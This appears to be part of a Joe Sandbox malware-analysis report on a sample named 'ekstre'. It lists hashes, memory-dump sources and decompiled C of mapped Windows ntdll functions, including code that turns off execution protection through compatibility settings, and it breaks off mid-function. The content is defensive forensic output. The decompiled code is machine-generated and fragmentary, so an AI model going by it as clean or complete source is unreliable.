API ID:
String ID:
API String ID:
Opcode ID: 7e4dd1d6b57b6eb0cef8cc1dc5b243bb94ddd59c96d3c1489e8b00062e2c4ae0
Instruction ID: 5d6bdf9fd742ccd36988dac1924424ee5c749f2795663677ad1a7b329e7d9d53
Opcode Fuzzy Hash: 7e4dd1d6b57b6eb0cef8cc1dc5b243bb94ddd59c96d3c1489e8b00062e2c4ae0
Instruction Fuzzy Hash: 3D90022124544442E50065585988A07000547E024AF51D416A1066595DC675CC55B131

Uniqueness

Uniqueness Score: -1.00%

Function 341B3C90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c29d94f8d1723089d741fa215269db1c3a0ef36571c18d3eaf5709efe5366df
Instruction ID: 94433e432cf6c0d20abff58f2ddc44cc8f743286f36937c4eeb66263858509c0
Opcode Fuzzy Hash: 2c29d94f8d1723089d741fa215269db1c3a0ef36571c18d3eaf5709efe5366df
Instruction Fuzzy Hash: D190023524140402E91061585D84647004647E0346F51D816A0426558DC6B4CCA5B131

Uniqueness

Uniqueness Score: -1.00%

Function 341B2CD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39a02246a9a3dd73f2af2c3cdfb0ce4f967e1c0b1f030167ea1b31ac377c0bc3
Instruction ID: 889351d09dfc8eb36c3b86a9c19d73311606aeb5f212f5d0cede8db669335a73
Opcode Fuzzy Hash: 39a02246a9a3dd73f2af2c3cdfb0ce4f967e1c0b1f030167ea1b31ac377c0bc3
Instruction Fuzzy Hash: 3A90023128140402E54171584984607000957E0286F91C417A0426554EC6B5CE5ABA71

Uniqueness

Uniqueness Score: -1.00%

Function 341B2D50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b5b2bc5a5e447a66510899ac7e86e2dd1751f86ec54e85b3226ffd3a80b748d
Instruction ID: c4717e6273b899761aa58d4d8fe519a4c3dd7ef165b86c4c7a7b3663793d5382
Opcode Fuzzy Hash: 0b5b2bc5a5e447a66510899ac7e86e2dd1751f86ec54e85b3226ffd3a80b748d
Instruction Fuzzy Hash: F290022134140402E50261584994607000987E138AF91C417E1426555DC675CD57B132

Uniqueness

Uniqueness Score: -1.00%

Function 341B2E00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9b06552e9b5ff76c5d02b4c02042d3426cbefb47d1178f69f0f0394e8c92e5e
Instruction ID: fe633ad4c0acf3a4dc9c7431b3d614b38f260231d43626647e459f9f2bf94485
Opcode Fuzzy Hash: b9b06552e9b5ff76c5d02b4c02042d3426cbefb47d1178f69f0f0394e8c92e5e
Instruction Fuzzy Hash: 0090026124180403E54065584D84607000547E0347F51C416A2066555ECA79CC557135

Uniqueness

Uniqueness Score: -1.00%

Function 341B2E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ed295807ab5604236d2b654a04a216eb41934f1159020ff5745f7464e634756
Instruction ID: e70f9751624223188b6915acdd1d2dca49de307d25c6f70297df19fd75abb4cd
Opcode Fuzzy Hash: 5ed295807ab5604236d2b654a04a216eb41934f1159020ff5745f7464e634756
Instruction Fuzzy Hash: 1790026125140042E50461584984707004547F1246F51C417A2156554CC579CC656135

Uniqueness

Uniqueness Score: -1.00%

Function 341B2EC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c551d3335caaf9534130b119d94abe7a80994e2a358c5ddf2e529b1cffe0373
Instruction ID: d43683eeb3d61a39a6d4242987e7212951de860eaac2957759a6d4a889ffbb42
Opcode Fuzzy Hash: 1c551d3335caaf9534130b119d94abe7a80994e2a358c5ddf2e529b1cffe0373
Instruction Fuzzy Hash: D590023124180402E50061584D88747000547E0347F51C416A5166555EC6B5CC957531

Uniqueness

Uniqueness Score: -1.00%

Function 341B2F30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cddaaddb9861466c2330c052ef6c67b89a12e4ec35c279b15a088c67561a496b
Instruction ID: a5e5040bc869d8268f7328da712773b6c7c3976b7e4bb77ed2f3282e122169a5
Opcode Fuzzy Hash: cddaaddb9861466c2330c052ef6c67b89a12e4ec35c279b15a088c67561a496b
Instruction Fuzzy Hash: 8A90022124184442E54062584D84B0F410547F1247F91C41EA4157554CC975CC596731

Uniqueness

Uniqueness Score: -1.00%

Function 341B2FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11483f22571c49aed6b021a71042046ae88f8f40d0d6f58bf84b3ff87b5d01e2
Instruction ID: f1fb7d6d88f63ca42faa4e2f97acbdfac7d4c28b96260a51540aefbfb241229b
Opcode Fuzzy Hash: 11483f22571c49aed6b021a71042046ae88f8f40d0d6f58bf84b3ff87b5d01e2
Instruction Fuzzy Hash: D990022128140802E54071588994707000687E0646F51C416A0026554DC676CD6976B1

Uniqueness

Uniqueness Score: -1.00%

Function 3424A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3424A25D
RtlDebugPrintTimes.NTDLL ref: 3424A2F1
RtlDebugPrintTimes.NTDLL ref: 3424A314
RtlDebugPrintTimes.NTDLL ref: 3424A340
RtlDebugPrintTimes.NTDLL ref: 3424A415
RtlDebugPrintTimes.NTDLL ref: 3424A468
RtlDebugPrintTimes.NTDLL ref: 3424A487
RtlDebugPrintTimes.NTDLL ref: 3424A4B8

Strings

HEAP: , xrefs: 3424A206

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: a03196264b18d19e566ad29ff3a1e4a9482514d5d18018e798409f5c7a5024e0
Instruction ID: 6562b61555c76acfec240453c1af228c7c576209f22c554cda63e71346361e8a
Opcode Fuzzy Hash: a03196264b18d19e566ad29ff3a1e4a9482514d5d18018e798409f5c7a5024e0
Instruction Fuzzy Hash: 62A1BA75B143128FD708CE28C895A1ABBEAFB88350F16456DE946EB350EB70EC05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 341A7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E341A7550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x3426b370 ^ _t107;
				_v8 =  *0x3426b370 ^ _t107;
				_t105 = __ecx;
				if( *0x34266664 == 0) {
					L5:
					return L341B4B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E3417E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E341A7738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E341A763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = L341B2B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E341A76ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E341FEF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E341B8F40( &_v548, 0, 0x214);
						_t106 =  *0x34266664;
						_t110 = _t108 + 0x20;
						 *0x342691e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x34266664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E341B4C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E341FEF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = L341BA9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E341FEF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E341BA690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E341FEF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E341ECC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E341FEF10();
						goto L15;
					}
					L8:
					_t56 = E341A7648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x341a7560
0x341a7562
0x341a756f
0x341a7571
0x341a75ab
0x341a75b9
0x341a75b9
0x341a7579
0x341a7583
0x341a758f
0x341e4443
0x341a7595
0x341a759e
0x341a759e
0x341a75a2
0x341a75bc
0x341a75c2
0x341a75c7
0x341a75c9
0x341a7621
0x341a7623
0x341a7624
0x341a75f8
0x341a75ff
0x341a7601
0x341a762c
0x341a7603
0x341a7609
0x341a7610
0x341a7612
0x341a7612
0x341a7612
0x341a7614
0x341a7616
0x341a7630
0x341a7633
0x341a7633
0x341a7618
0x341a761a
0x341e45c9
0x341e45c9
0x341e45d1
0x341e45d2
0x341e45d4
0x341e45d6
0x341e45d6
0x00000000
0x341a761a
0x341a75ce
0x341a75d4
0x341a75da
0x341a75df
0x341a75e1
0x341e444a
0x341e4450
0x00000000
0x00000000
0x341e4456
0x341e4469
0x341e4476
0x341e4486
0x341e448b
0x341e4497
0x341e44b9
0x341e44bf
0x341e44c1
0x341e44c3
0x00000000
0x00000000
0x341e44c9
0x341e44cf
0x341e44d1
0x00000000
0x00000000
0x341e44dc
0x341e44de
0x00000000
0x00000000
0x341e44e6
0x341e44ed
0x341e44ef
0x341e45c4
0x00000000
0x341e45c4
0x341e44f7
0x341e44f8
0x341e4510
0x341e4515
0x341e4524
0x341e452b
0x341e452c
0x341e452e
0x341e4556
0x341e4561
0x341e4567
0x341e4569
0x341e456c
0x341e456e
0x341e4574
0x341e4576
0x00000000
0x00000000
0x00000000
0x00000000
0x341e457c
0x341e457c
0x341e4584
0x341e4588
0x341e458a
0x341e458c
0x341e458e
0x341e458e
0x341e459b
0x341e45a0
0x341e45a7
0x341e45ac
0x341e45ae
0x00000000
0x00000000
0x341e45b4
0x341e45b4
0x341e45b7
0x341e45b7
0x00000000
0x341e45bf
0x341e4530
0x341e4535
0x341e4537
0x341e4539
0x00000000
0x341e453e
0x341a75e7
0x341a75e9
0x341a75ee
0x341a75f0
0x00000000
0x00000000
0x341a75f2
0x00000000
0x341a75a4
0x341a75a4
0x341a75a4
0x00000000
0x341a75a4

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 341E454D
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 341E4507
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 341E4530
CLIENT(ntdll): Processing section info %ws..., xrefs: 341E4592
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 341E4460
ExecuteOptions, xrefs: 341E44AB
Execute=1, xrefs: 341E451E

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 06be0c559f452e0269e0e1ea898fd46b842fe0a6087f56485e8267df41584ce5
Instruction ID: 161213293302bdca0dc213c231a622172a5f2cbbfdfd3248438dbd88879986cc
Opcode Fuzzy Hash: 06be0c559f452e0269e0e1ea898fd46b842fe0a6087f56485e8267df41584ce5
Instruction Fuzzy Hash: 7651287AA00B19AEFF119A94DCD8FE977A9EF08340F4405E9E525A7180EB70DB418F50

Uniqueness

Uniqueness Score: -1.00%

Function 3418A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E3418A170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = E3418A600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E3418A760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x342691e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = E34174428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = E3418A600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					E341FEF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
